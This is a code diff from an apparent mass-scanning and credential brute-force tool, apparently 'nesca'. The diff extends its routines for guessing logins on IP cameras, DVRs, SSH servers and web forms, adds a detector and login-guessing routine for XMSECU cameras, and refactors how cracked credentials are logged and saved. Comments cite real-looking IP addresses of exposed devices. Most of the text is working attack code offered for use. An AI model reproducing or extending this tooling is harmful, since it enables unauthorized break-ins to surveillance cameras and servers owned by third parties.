+ rowIndex = Utils::addBARow(QString(ip) + ":" + QString::number(wDVRPort), QString(login) + ":" + QString(pass), QString::number((passCounter / (double)(MaxPass*MaxLogin)) * 100).mid(0, 4) + "%", rowIndex);
+
++passCounter;
Sleep(200);
}
}
- if (rowIndex == -1) {
- nesca_3::addBARow(QString(ip) + ":" + QString::number(wDVRPort), "--", "FAIL");
- }
- else {
- stt->doEmitionChangeBARow(rowIndex, "--", "FAIL");
- }
+ rowIndex = Utils::addBARow(QString(ip) + ":" + QString::number(wDVRPort), "--", "FAIL", rowIndex);
+
return lps;
}
diff --git a/IPCAuth.cpp b/IPCAuth.cpp
index 6abf528..641350b 100644
--- a/IPCAuth.cpp
+++ b/IPCAuth.cpp
@@ -6,14 +6,15 @@
lopaStr IPC::IPCBrute(const char *ip, int port, char *SPEC, const std::string *cookie)
{
lopaStr lps = {"UNKNOWN", "", ""};
- bool result = true;
+ int result = 0;
char login[128] = {0};
char pass[128] = {0};
char request[1024] = {0};
int passCounter = 1;
int rowIndex = -1;
- std::vector negVector;
+ std::vector negVector;
+ std::vector slideVector;
if(strcmp(SPEC, "IPC") == 0)
{
negVector.push_back("Invalid");
@@ -91,6 +92,11 @@ lopaStr IPC::IPCBrute(const char *ip, int port, char *SPEC, const std::string *c
{
negVector.push_back("Invalid credentials");
}
+ else if (strcmp(SPEC, "XMSECU") == 0)
+ {
+ slideVector.push_back("errornumber=-1");
+ negVector.push_back("Log in failed");
+ }
else
{
stt->doEmitionRedFoundData("[_IPCameraBrute] No \"SPEC\" specified!");
@@ -101,22 +107,20 @@ lopaStr IPC::IPCBrute(const char *ip, int port, char *SPEC, const std::string *c
for(int i = 0; i < MaxLogin; ++i)
{
if(!globalScanFlag) break;
- if(strcmp(loginLst[i], " ") == 0) continue;
- //ZeroMemory(login, sizeof(login));
- login[0] = 0;
- strcpy(login, loginLst[i]);
+ FileUpdater::cv.wait(FileUpdater::lk, [] {return FileUpdater::ready; });
+ strcpy(login, loginLst[i]);
+ if(strcmp(login, " ") == 0) continue;
for(int j = 0; j < MaxPass; ++j)
{
FileUpdater::cv.wait(FileUpdater::lk, []{return FileUpdater::ready;});
if(!globalScanFlag) break;
if(strcmp(passLst[j], " ") == 0) continue;
+ result = 0;
- //ZeroMemory(pass, sizeof(pass));
- pass[0] = 0;
strcpy(pass, passLst[j]);
- //ZeroMemory(request, sizeof(request));
+ ZeroMemory(request, sizeof(request));
request[0] = 0;
if(strcmp(SPEC, "IPC") == 0)
{
@@ -191,7 +195,6 @@ lopaStr IPC::IPCBrute(const char *ip, int port, char *SPEC, const std::string *c
}
else if (strcmp(SPEC, "JUAN") == 0)
{
- //sprintf(request, "%s:%d/cgi-bin/gw.cgi?xml=&_=1450923182693",
sprintf(request, "%s/cgi-bin/gw.cgi?xml=%%3Cjuan%%20ver=%%22%%22%%20squ=%%22%%22%%20dir=%%22%%22%%3E%%3Cenvload%%20type=%%220%%22%%20usr=%%22%s%%22%%20pwd=%%22%s%%22/%%3E%%3C/juan%%3E&_=1450923182693",
ip, login, pass);
}
@@ -226,6 +229,12 @@ Content-Disposition: form-data; name=\"password\"\r\n\
Content-Length: %d\r\n\r\n\
%s", cl, tempPostData);
}
+ else if (strcmp(SPEC, "XMSECU") == 0)
+ {
+ doPost = true;
+ sprintf(request, "%s/Login.htm", ip);
+ sprintf(postData, "command=login&username=%s&password=%s", login, pass);
+ }
std::string buffer;
if (cookie->size() > 0) {
@@ -241,65 +250,53 @@ Content-Length: %d\r\n\r\n\
}
if (res == -2) {
- if (rowIndex == -1) {
- nesca_3::addBARow(QString(ip), "--", "FAIL");
- }
- else {
- stt->doEmitionChangeBARow(rowIndex, "--", "FAIL");
- }
+ rowIndex = Utils::addBARow(QString(ip), "--", "FAIL", rowIndex);
return lps;
}
else if (res != -1) {
+ for (int i = 0; i < slideVector.size(); ++i)
+ {
+ if (Utils::ustrstr(buffer, slideVector[i]) != -1)
+ {
+ result = -1;
+ break;
+ };
+ }
+ if (-1 == result) {
+ passCounter += MaxPass - 1;
+ break;
+ }
+
for (int i = 0; i < negVector.size(); ++i)
{
if (Utils::ustrstr(buffer, negVector[i]) != -1)
{
- result = false;
+ result = 1;
break;
};
};
- if (result)
+ if (0 == result)
{
- strcpy(lps.login, loginLst[i]);
- strcpy(lps.pass, passLst[j]);
+ strcpy(lps.login, login);
+ strcpy(lps.pass, pass);
- if (rowIndex == -1) {
- nesca_3::addBARow(QString(ip), QString(login) + ":" + QString(pass), "OK");
- }
- else {
- stt->doEmitionChangeBARow(rowIndex, QString(login) + ":" + QString(pass), "OK");
- }
+ rowIndex = Utils::addBARow(QString(ip), QString(login) + ":" + QString(pass), "OK", rowIndex);
return lps;
- };
+ }
}
else {
return lps;
}
-
- if (BALogSwitched) {
- if (rowIndex == -1) {
- rowIndex = nesca_3::addBARow(QString(ip),
- QString(login) + ":" + QString(pass),
- QString::number((passCounter / (double)(MaxPass*MaxLogin)) * 100).mid(0, 4) + "%");
- }
- else {
- stt->doEmitionChangeBARow(rowIndex, QString(login) + ":" + QString(pass),
- QString::number((passCounter / (double)(MaxPass*MaxLogin)) * 100).mid(0, 4) + "%");
- }
- }
- else { rowIndex = -1; }
+
+ rowIndex = Utils::addBARow(QString(ip), QString(login) + ":" + QString(pass), QString::number((passCounter / (double)(MaxPass*MaxLogin)) * 100).mid(0, 4) + "%", rowIndex);
++passCounter;
Sleep(100);
};
};
- if (rowIndex == -1) {
- nesca_3::addBARow(QString(ip), "--", "FAIL");
- }
- else {
- stt->doEmitionChangeBARow(rowIndex, "--", "FAIL");
- }
+
+ rowIndex = Utils::addBARow(QString(ip), "--", "FAIL", rowIndex);
return lps;
}
diff --git a/MainStarter.cpp b/MainStarter.cpp
index 8ba17ea..e52e4f0 100644
--- a/MainStarter.cpp
+++ b/MainStarter.cpp
@@ -1399,7 +1399,7 @@ void MainStarter::runAuxiliaryThreads() {
void MainStarter::createResultFiles() {
char fileName[256] = { 0 };
- sprintf(fileName, "./result_files-%s", Utils::getStartDate().c_str());
+ sprintf(fileName, "./" DIR_NAME "%s_%s", Utils::getStartDate().c_str(), Utils::getCurrentTarget().c_str());
#if defined(WIN32) || defined(_WIN32) || defined(__WIN32) && !defined(__CYGWIN__)
bool res = CreateDirectoryA(fileName, NULL);
if (!res) {
@@ -1484,6 +1484,10 @@ void MainStarter::start(const char* targets, const char* ports) {
thread_setup();
+
+ QString fileSuffix = QString(targets);
+ fileSuffix = fileSuffix.mid(fileSuffix.lastIndexOf("/") + 1);
+ Utils::setCurrentTarget(fileSuffix.toUtf8().constData());
createResultFiles();
if (loadTargets(targets) == -1 ||
diff --git a/SSHAuth.cpp b/SSHAuth.cpp
index 123021e..d80db76 100644
--- a/SSHAuth.cpp
+++ b/SSHAuth.cpp
@@ -83,19 +83,15 @@ int _sshConnect(const char *user, const char *pass, const char *host, int port)
return 0;
}
-int check_ssh_pass(const int rowIndex, const char *user, const char *pass,
+int check_ssh_pass(int rowIndex, const char *user, const char *pass,
const char *userPass, const char *host, int port,
std::string *buffer, const char *banner) {
int res = _sshConnect(user, pass, host, port);
if(res == 0)
{
- if (rowIndex == -1) {
- nesca_3::addBARow(QString(host), QString(userPass) + "@" + QString(host), "OK");
- }
- else {
- stt->doEmitionChangeBARow(rowIndex, QString(userPass) + "@" + QString(host), "OK");
- }
+ rowIndex = Utils::addBARow(QString(host), QString(userPass) + "@" + QString(host), "OK", rowIndex);
+
buffer->append(userPass);
buffer->append("@");
buffer->append(host);
@@ -132,61 +128,29 @@ int SSHBrute(const char* host, int port, std::string *buffer, const char *banner
strncpy(login, temp, ptr1 - temp);
strcpy(pass, ptr1 + 1);
- if (BALogSwitched) {
- if (rowIndex == -1) {
- rowIndex = nesca_3::addBARow(QString(host) + ":" + QString::number(port),
- QString(login) + ":" + QString(pass),
- QString::number((passCounter / (double)(MaxSSHPass)) * 100).mid(0, 4) + "%");
- }
- else {
- stt->doEmitionChangeBARow(rowIndex, QString(login) + ":" + QString(pass),
- QString::number((passCounter / (double)(MaxSSHPass)) * 100).mid(0, 4) + "%");
- }
- }
- else { rowIndex = -1; }
+ rowIndex = Utils::addBARow(QString(host) + ":" + QString::number(port), QString(login) + ":" + QString(pass), QString::number((passCounter / (double)(MaxSSHPass)) * 100).mid(0, 4) + "%", rowIndex);
++passCounter;
res = check_ssh_pass(rowIndex, login, pass, temp, host, port, buffer, banner);
- //ZeroMemory(login, sizeof(login));
- //ZeroMemory(pass, sizeof(pass));
- //ZeroMemory(temp, sizeof(temp));
- login[0] = 0;
- pass[0] = 0;
- temp[0] = 0;
if(res == 0)
{
if (i == 0) {
- if (rowIndex == -1) {
- nesca_3::addBARow(QString(host) + ":" + QString::number(port), "--", "FAILHIT");
- }
- else {
- stt->doEmitionChangeBARow(rowIndex, "--", "FAILHIT");
- }
+ rowIndex = Utils::addBARow(QString(host) + ":" + QString::number(port), "--", "FAILHIT", rowIndex);
return -2; //Failhit
}
return 1;
}
else if(res == -2)
{
- if (rowIndex == -1) {
- nesca_3::addBARow(QString(host) + ":" + QString::number(port), "--", "FAIL");
- }
- else {
- stt->doEmitionChangeBARow(rowIndex, "--", "FAIL");
- }
+ rowIndex = Utils::addBARow(QString(host) + ":" + QString::number(port), "--", "FAIL", rowIndex);
return -2;
};
Sleep(500);
};
- if (rowIndex == -1) {
- nesca_3::addBARow(QString(host) + ":" + QString::number(port), "--", "FAIL");
- }
- else {
- stt->doEmitionChangeBARow(rowIndex, "--", "FAIL");
- }
+ rowIndex = Utils::addBARow(QString(host) + ":" + QString::number(port), "--", "FAIL", rowIndex);
return -1;
}
diff --git a/Utils.cpp b/Utils.cpp
index 002a07c..0120a95 100644
--- a/Utils.cpp
+++ b/Utils.cpp
@@ -1,8 +1,10 @@
#include "Utils.h"
#include
+#include "STh.h"
std::string Utils::startDate;
std::string Utils::startTime;
+std::string Utils::currentTarget;
//void Utils::emitScaryError() {
// __asm{
@@ -45,26 +47,44 @@ std::string Utils::getHeaderValue(std::string *buff, const std::string headerVal
}
void Utils::saveStartDate() {
QDate date = QDate::currentDate();
- startDate = std::to_string(date.day())
- + "_"
- + std::to_string(date.month())
- + "_"
- + std::to_string(date.year());
+ startDate = date.toString("dd.MM.yyyy").toUtf8().constData();
}
+
void Utils::saveStartTime() {
QTime time = QTime::currentTime();
- startTime = std::to_string(time.hour())
- + "_"
- + std::to_string(time.minute());
+ startTime = time.toString("HH_mm").toUtf8().constData();
}
std::string Utils::getStartDate() {
return startDate;
}
+int Utils::addBARow(QString str1, QString str2, QString str3, int rowIndex) {
+ if (BALogSwitched) {
+ if (rowIndex == -1) {
+ rowIndex = nesca_3::addBARow(str1, str2, str3);
+ }
+ else {
+ stt->doEmitionChangeBARow(rowIndex, str2, str3);
+ }
+
+ return rowIndex;
+ }
+
+ return -1;
+}
+
std::string Utils::getStartTime() {
return startTime;
}
+void Utils::setCurrentTarget(const std::string target) {
+ currentTarget = target;
+}
+
+std::string Utils::getCurrentTarget() {
+ return currentTarget;
+}
+
int Utils::isDigest(const std::string *buffer) {
if (Utils::ustrstr(buffer, "401 authorization") != -1
|| Utils::ustrstr(buffer, "401 unauthorized") != -1
diff --git a/Utils.h b/Utils.h
index 83235ce..b7041de 100644
--- a/Utils.h
+++ b/Utils.h
@@ -28,6 +28,7 @@ private:
class Utils {
private: static std::string startDate;
private: static std::string startTime;
+private: static std::string currentTarget;
public:
static int isDigest(const std::string *buffer);
@@ -53,7 +54,7 @@ public:
else return -1;
}
- template static int ustrstr(const T *str1,
+ template static int ustrstr(T *str1,
const char* str2c,
const locale& loc = locale()) {
@@ -91,7 +92,10 @@ public:
static void saveStartTime();
static std::string getStartDate();
static std::string getStartTime();
+ static void setCurrentTarget(const std::string target);
+ static std::string getCurrentTarget();
static void emitScaryError();
+ static int addBARow(QString str1, QString str2, QString str3, int rowIndex);
static std::string getHeaderValue(std::string *buff, const std::string headerValue, const std::string outputName);
};
diff --git a/WebformWorker.cpp b/WebformWorker.cpp
index a98db13..34e04a2 100644
--- a/WebformWorker.cpp
+++ b/WebformWorker.cpp
@@ -83,17 +83,7 @@ lopaStr WFClass::doGetCheck(const char *ip,
Connector con;
if(con.nConnect(nip, port, &buffer) <= 0) return result;
- if (BALogSwitched) {
- if (rowIndex == -1) {
- //stt->doEmitionAddBARow(rowIndex, QString(ip) + ":" + QString::number(port),
- // QString(login) + ":" + QString(pass),
- // QString::number((++passCounter / (double)(MaxWFPass*MaxWFLogin)) * 100).mid(0, 4) + "%");
- }
- else {
- stt->doEmitionChangeBARow(rowIndex, QString(login) + ":" + QString(pass),
- QString::number((++passCounter / (double)(MaxWFPass*MaxWFLogin)) * 100).mid(0, 4) + "%");
- }
- }
+ rowIndex = Utils::addBARow(QString(ip), QString(login) + ":" + QString(pass), QString::number((++passCounter / (double)(MaxWFPass*MaxWFLogin)) * 100).mid(0, 4) + "%", rowIndex);
result = parseResponse(ip, port, &buffer, formVal, login, pass);
if(i == 0) ++i;
@@ -144,18 +134,8 @@ lopaStr WFClass::doPostCheck(const char *ip,
std::string buffer;
Connector con;
if (con.nConnect(nip, port, &buffer, postData) <= 0) return result;
-
- if (BALogSwitched) {
- if (rowIndex == -1) {
- //stt->doEmitionAddBARow(rowIndex, QString(ip) + ":" + QString::number(port),
- // QString(login) + ":" + QString(pass),
- // QString::number((++passCounter / (double)(MaxWFPass*MaxWFLogin)) * 100).mid(0, 4) + "%");
- }
- else {
- stt->doEmitionChangeBARow(rowIndex, QString(login) + ":" + QString(pass),
- QString::number((++passCounter / (double)(MaxWFPass*MaxWFLogin)) * 100).mid(0, 4) + "%");
- }
- }
+
+ rowIndex = Utils::addBARow(QString(ip), QString(login) + ":" + QString(pass), QString::number((++passCounter / (double)(MaxWFPass*MaxWFLogin)) * 100).mid(0, 4) + "%", rowIndex);
++passCounter;
return parseResponse(ip, port, &buffer, formVal, login, pass);
diff --git a/finder.cpp b/finder.cpp
index d1ff65a..1bebaab 100644
--- a/finder.cpp
+++ b/finder.cpp
@@ -248,21 +248,28 @@ bool isNegative(const std::string *buff, const char *ip, int port, const char *c
}
}
- std::size_t ptr1 = buff->find("\r\n\r\n");
- if (ptr1 != -1) {
- int sz = buff->size();
- int nSz = buff->substr(ptr1, sz).size() - 4;
- if (nSz < 100) {
- if (gNegDebugMode)
- {
- QTextCodec *nCodec = QTextCodec::codecForName("Windows-1251");
- stt->doEmitionDebugFoundData("[" + QString(ip) +
- "]\tNegative hit: Size:" + QString::number(nSz));
- }
- return true;
- }
- }
+ //if (buff->size() < 200) {
+ // if (buff->find("rtsp") == -1) {
+ // std::size_t ptr1 = buff->find("\r\n\r\n");
+ // if (ptr1 != -1) {
+ // int sz = buff->size();
+ // int nSz = buff->substr(ptr1, sz).size() - 4;
+ // if (nSz < 100) {
+ // if (gNegDebugMode)
+ // {
+ // QTextCodec *nCodec = QTextCodec::codecForName("Windows-1251");
+ // stt->doEmitionDebugFoundData("[" + QString(ip) +
+ // "]\tNegative hit: Size:" + QString::number(nSz));
+ // }
+
+ // ++filtered;
+ // return true;
+ // }
+ // }
+ // }
+ //}
+
return false;
}
int globalSearchPrnt(const std::string *buff)
@@ -391,7 +398,7 @@ int sharedDetector(const char * ip, int port, const std::string *buffcpy, const
if(Utils::ustrstr(buffcpy, "hikvision-webs") != -1
|| (
(Utils::ustrstr(buffcpy, "hikvision digital") != -1 || Utils::ustrstr(buffcpy, "doc/page/login.asp") != -1)
- && Utils::ustrstr(buffcpy, "dvrdvs-webs") != -1 || Utils::ustrstr(buffcpy, "app-webs") != -1)
+ && Utils::ustrstr(buffcpy, "dvrdvs-webs") != -1 || Utils::ustrstr(buffcpy, "app-webs") != -1 || Utils::ustrstr(buffcpy, "DNVRS-Webs") != -1)
||
(Utils::ustrstr(buffcpy, "lapassword") != -1
&& Utils::ustrstr(buffcpy, "lausername") != -1
@@ -463,10 +470,12 @@ int sharedDetector(const char * ip, int port, const std::string *buffcpy, const
&& Utils::ustrstr(buffcpy, "login_chk_usr_pwd") != -1
) return 57; //Network video client (http://203.190.113.54:60001/)
if (Utils::ustrstr(buffcpy, "QlikView") != -1) return 58; //QLikView (http://203.96.113.183/qlikview/login.htm)
- if (Utils::ustrstr(buffcpy, "RTSP/1.0") != -1) return 59; //RTSP (http://121.72.55.19:554/ Hisilicon Ipcam)
+ if (Utils::ustrstr(buffcpy, "RTSP/1.") != -1) return 59; //RTSP (http://121.72.55.19:554/ Hisilicon Ipcam)
if (Utils::ustrstr(buffcpy, "ACTi Corporation") != -1) return 60; //ACTi (http://87.197.30.20/cgi-bin/videoconfiguration.cgi)
if (Utils::ustrstr(buffcpy, "airos_logo") != -1) return 61; //AirOS (http://103.5.73.114/login.cgi?uri=/)
-
+ if (Utils::ustrstr(buffcpy, "NetSuveillanceWebCookie") != -1 &&
+ Utils::ustrstr(buffcpy, "resizeL") != -1) return 62; //XMSECU (http://121.72.179.76/Login.htm)
+
//if (Utils::ustrstr(buffcpy, "ShareCenter") != -1) return 58; //ShareCenter (http://49.50.207.6/)
if (Utils::ustrstr(buffcpy, "nas - ") != -1
@@ -597,12 +606,12 @@ int __checkFileExistence(int flag)
{
char fileName[64] = {0};
- if (flag == -22) sprintf(fileName, "./result_files-%s/" TYPE5 ".html", Utils::getStartDate().c_str());
- else if (flag == 0 || flag == 15 || flag == -10) sprintf(fileName, "./result_files-%s/" TYPE1 ".html", Utils::getStartDate().c_str());
- else if (flag == 3) sprintf(fileName, "./result_files-%s/" TYPE2 ".html", Utils::getStartDate().c_str());
- else if (flag == 16) sprintf(fileName, "./result_files-%s/" TYPE4 ".html", Utils::getStartDate().c_str());
+ if (flag == -22) sprintf(fileName, "./" DIR_NAME "%s_%s/" TYPE5 ".html", Utils::getStartDate().c_str(), Utils::getCurrentTarget().c_str());
+ else if (flag == 0 || flag == 15 || flag == -10) sprintf(fileName, "./" DIR_NAME "%s_%s/" TYPE1 ".html", Utils::getStartDate().c_str(), Utils::getCurrentTarget().c_str());
+ else if (flag == 3) sprintf(fileName, "./" DIR_NAME "%s_%s/" TYPE2 ".html", Utils::getStartDate().c_str(), Utils::getCurrentTarget().c_str());
+ else if (flag == 16) sprintf(fileName, "./" DIR_NAME "%s_%s/" TYPE4 ".html", Utils::getStartDate().c_str(), Utils::getCurrentTarget().c_str());
else if(flag >= 17 || flag == 11 || flag == 12
- || flag == 13 || flag == 14 || flag == 1) sprintf(fileName, "./result_files-%s/" TYPE3 ".html", Utils::getStartDate().c_str());
+ || flag == 13 || flag == 14 || flag == 1) sprintf(fileName, "./" DIR_NAME "%s_%s/" TYPE3 ".html", Utils::getStartDate().c_str(), Utils::getCurrentTarget().c_str());
FILE *f = fopen(fileName, "r");
if(f == NULL) return true;
@@ -620,44 +629,39 @@ bool ftsBA = true;
std::atomic fOpened(false);
void fputsf(char *text, int flag)
{
- FILE *file = NULL;
-
char fileName[256] = { 0 };
if(flag == 0 || flag == 15 || flag == -10)
{
- if (ftsCameras) ftsCameras = __checkFileExistence(flag);
- sprintf(fileName, "./result_files-%s/" TYPE1 ".html", Utils::getStartDate().c_str());
- file = fopen(fileName, "a");
+ if (ftsCameras) ftsCameras = __checkFileExistence(flag);
+ sprintf(fileName, "./" DIR_NAME "%s_%s/" TYPE1 ".html", Utils::getStartDate().c_str(), Utils::getCurrentTarget().c_str());
}
else if(flag == 1)
{
if(ftsOther) ftsOther = __checkFileExistence(flag);
- sprintf(fileName, "./result_files-%s/" TYPE2 ".html", Utils::getStartDate().c_str());
- file = fopen(fileName, "a");
+ sprintf(fileName, "./" DIR_NAME "%s_%s/" TYPE2 ".html", Utils::getStartDate().c_str(), Utils::getCurrentTarget().c_str());
}
else if(flag == -22)
{
if(ftsSSH) ftsSSH = __checkFileExistence(flag);
- sprintf(fileName, "./result_files-%s/" TYPE5 ".html", Utils::getStartDate().c_str());
- file = fopen(fileName, "a");
+ sprintf(fileName, "./" DIR_NAME "%s_%s/" TYPE5 ".html", Utils::getStartDate().c_str(), Utils::getCurrentTarget().c_str());
}
else if(flag == 3)
{
if(ftsFTP) ftsFTP = __checkFileExistence(flag);
- sprintf(fileName, "./result_files-%s/" TYPE4 ".html", Utils::getStartDate().c_str());
- file = fopen(fileName, "a");
+ sprintf(fileName, "./" DIR_NAME "%s_%s/" TYPE4 ".html", Utils::getStartDate().c_str(), Utils::getCurrentTarget().c_str());
}
else if(flag >= 17 || flag == 11 || flag == 12
|| flag == 13 || flag == 14 || flag == 2
)
{
if(ftsBA) ftsBA = __checkFileExistence(flag);
- sprintf(fileName, "./result_files-%s/" TYPE3 ".html", Utils::getStartDate().c_str());
- file = fopen(fileName, "a");
+ sprintf(fileName, "./" DIR_NAME "%s_%s/" TYPE3 ".html", Utils::getStartDate().c_str(), Utils::getCurrentTarget().c_str());
}
else stt->doEmitionRedFoundData("Unknown flag [FLAG: " + QString::number(flag) + "]");
+ FILE *file = fopen(fileName, "a");
+
if(file != NULL)
{
time_t rtime;
@@ -874,7 +878,7 @@ void _specFillerCustom(const char *ip, int port, const char *finalstr, const cha
if (strlen(login) > 0 || strlen(pass) > 0)
{
- sprintf(log, "%s:%s (%s:%s) T: %s\n",
+ sprintf(log, "%s: %s (%s:%s) T: %s\n",
classString, ip, ip, login, pass, finalstr);
}
@@ -911,20 +915,20 @@ void _specFillerBA(const char *ip, int port, const char *finalstr, const char *l
if (strlen(login) > 0 || strlen(pass) > 0)
{
if (8 == offset) {
- sprintf(log, "[BA]:%s:%s@%s T: %s\n",
+ sprintf(log, "[BA]: %s:%s@%s T: %s\n",
login, pass, ip + offset, login, pass, ip + offset, finalstr);
}
else {
- sprintf(log, "[BA]:%s:%s@%s T: %s\n",
+ sprintf(log, "[BA]: %s:%s@%s T: %s\n",
login, pass, ip + offset, login, pass, ip + offset, finalstr);
}
} else {
if (8 == offset) {
- sprintf(log, "[BA]:%s T: %s\n",
+ sprintf(log, "[BA]: %s T: %s\n",
ip + offset, ip + offset, finalstr);
}
else {
- sprintf(log, "[BA]:%s T: %s\n",
+ sprintf(log, "[BA]: %s T: %s\n",
ip + offset, ip + offset, finalstr);
}
}
@@ -942,15 +946,15 @@ void _specFillerRSTP(const char *ip, int port, const char *finalstr, const char
if (strlen(login) > 0 || strlen(pass) > 0)
{
- sprintf(log, "[RSTP]:%s:%d (%s:%s) T: %s\n",
- ip, port, login, pass, finalstr);
+ sprintf(log, "[RSTP]: %s11 (%s:%s) T: %s\n",
+ ip, ip, login, pass, finalstr);
}
else {
- sprintf(log, "[RSTP]:%s:%d T: %s\n",
- ip, port, finalstr);
+ sprintf(log, "[RSTP]: %s11 T: %s\n",
+ ip, ip, finalstr);
}
- stt->doEmitionFoundDataCustom(QString::fromLocal8Bit(log), "FF69B4");
+ stt->doEmitionFoundDataCustom(QString::fromLocal8Bit(log), "3090C7");
fputsf(log, flag);
}
@@ -1384,10 +1388,12 @@ int _specRTSPBrute(const char *ip, int port,
return -1;
}
- if (strstr(lps.login, "UNKNOWN") == NULL && strlen(lps.other) == 0)
+ if (strstr(lps.login, "UNKNOWN") == NULL)
{
- _specFillerRSTP(ip, port, finalstr, lps.login, lps.pass, flag);
- fillGlobalLogData(ip, port, std::to_string(size).c_str(), finalstr, lps.login, lps.pass, "", cp, "RTSP");
+ char title[512] = { 0 };
+ sprintf(title, "%s %s", lps.other, finalstr);
+ _specFillerRSTP(ip, port, title, lps.login, lps.pass, flag);
+ //fillGlobalLogData(ip, port, std::to_string(size).c_str(), finalstr, lps.login, lps.pass, "", cp, "RTSP");
};
}
@@ -2677,7 +2683,7 @@ std::string equivRedirectHandler(std::string *buff, char* ip, int port, Lexems *
int portPos = location.find(":", 7);
if (-1 != portPos) {
- int portPosEnd = location.find("/ \n>\"'", portPos);
+ int portPosEnd = location.find_first_of("/ \n>\"'", portPos);
if (-1 != portPosEnd) {
newPort = std::stoi(location.substr(portPos + 1, portPosEnd));
if (gDebugMode) {
@@ -2898,6 +2904,9 @@ std::string getHeader(const std::string *buffcpy, const int flag) {
return "[IOmega NAS]";
}
}
+ else if (STRSTR(buffcpy, "x-rtsp-tunnelled") != -1 || STRSTR(buffcpy, "rtsp://") != -1) {
+ return "[RTSP]";
+ }
else {
std::string tempBuff = buffcpy->c_str();
const std::string &result_ref = getTitle(tempBuff.c_str(), flag);
@@ -3013,7 +3022,7 @@ void parseFlag(int flag, char* ip, char *ipRaw, int port, std::string *buff, con
HikVis::hikCounter = 0;
HikVis::hikPart++;
}
- sprintf(fileName, "./result_files-%s/hikkafile_%s_part_%d.csv", date, date, HikVis::hikPart);
+ sprintf(fileName, "./" DIR_NAME "%s_%s/hikkafile_%s_part_%d.csv", date, Utils::getCurrentTarget().c_str(), date, HikVis::hikPart);
FILE *f = fopen(fileName, "a");
if (f != NULL) {
char string[1024] = { 0 };
@@ -3047,8 +3056,8 @@ void parseFlag(int flag, char* ip, char *ipRaw, int port, std::string *buff, con
HikVis::rviCounter = 0;
HikVis::rviPart++;
}
- sprintf(fileName, "./result_files-%s/rvifile_%s(%s)_part_%d.xml",
- date, date, Utils::getStartTime().c_str(), HikVis::rviPart);
+ sprintf(fileName, "./" DIR_NAME "%s_%s/rvifile_%s(%s)_part_%d.xml",
+ date, Utils::getCurrentTarget().c_str(), date, Utils::getStartTime().c_str(), HikVis::rviPart);
char string[1024] = { 0 };
FILE *fc = fopen(fileName, "r");
@@ -3132,8 +3141,15 @@ void parseFlag(int flag, char* ip, char *ipRaw, int port, std::string *buff, con
}
else if (flag == 34) //Hikvision ip cam
{
- if (_specBrute(ip, port, "[Hikvision] IP Camera", flag, "/PSIA/Custom/SelfExt/userCheck", "[DIGEST]", cp, size) == -1){
- _specBrute(ip, port, "[Hikvision] IP Camera", flag, "/PSIA/Custom/HIK/userCheck", "[DIGEST]", cp, size);
+ char ipNew[256] = { 0 };
+ if (strstri(ip, "https://") != NULL) {
+ sprintf(ipNew, "https://%s", ipRaw);
+ }
+ else {
+ sprintf(ipNew, "http://%s", ipRaw);
+ }
+ if (_specBrute(ipNew, port, "[Hikvision] IP Camera", flag, "/PSIA/Custom/SelfExt/userCheck", "[DIGEST]", cp, size) == -1){
+ _specBrute(ipNew, port, "[Hikvision] IP Camera", flag, "/PSIA/Custom/HIK/userCheck", "[DIGEST]", cp, size);
}
}
else if (flag == 35) //EasyCam
@@ -3269,11 +3285,9 @@ void parseFlag(int flag, char* ip, char *ipRaw, int port, std::string *buff, con
}
else if (flag == 59) //RTSP
{
- //char newIP[128] = {0};
- //strcpy(newIP, "rtsp://");
- //strncat(newIP, ipRaw, 96);
- //strcat(newIP, "/");
- _specRTSPBrute(ipRaw, port, header.c_str(), flag, "RTSP", cp, size);
+ char newIP[128] = {0};
+ sprintf(newIP, "rtsp://%s:%d/", ipRaw, port);
+ _specRTSPBrute(newIP, port, header.c_str(), flag, "RTSP", cp, size);
}
else if (flag == 60) //ACTi
{
@@ -3283,7 +3297,11 @@ void parseFlag(int flag, char* ip, char *ipRaw, int port, std::string *buff, con
{
_specWEBIPCAMBrute(ip, port, "[AirOS] WEB IP Camera", flag, "WEB Authorization", cp, size, "AirOS", &cookie);
}
-
+ else if (flag == 62) //XMSECU
+ {
+ _specWEBIPCAMBrute(ip, port, "[XMSECU] WEB IP Camera", flag, "WEB Authorization", cp, size, "XMSECU", &cookie);
+ }
+
else if (flag == 20) //AXIS Camera
{
if (_specBrute(ip, port, "AXIS Camera", flag, "/mjpg/video.mjpg", "Basic Authorization", cp, size) == -1) {
@@ -3359,19 +3377,26 @@ std::string handleRedirects(std::string *buffcpy, char* ip, int port) {
counter.iterationCount = 0;
std::string location = std::string(ip);
const std::string &locationEquiv = equivRedirectHandler(buffcpy, ip, port, &counter);
- location += locationEquiv;
+ if (locationEquiv.find("http") == 0) {
+ location = locationEquiv;
+ }
+ else {
+ location += locationEquiv;
+ }
counter.iterationCount = 0;
if (Utils::ustrstr((const std::string *) buffcpy, "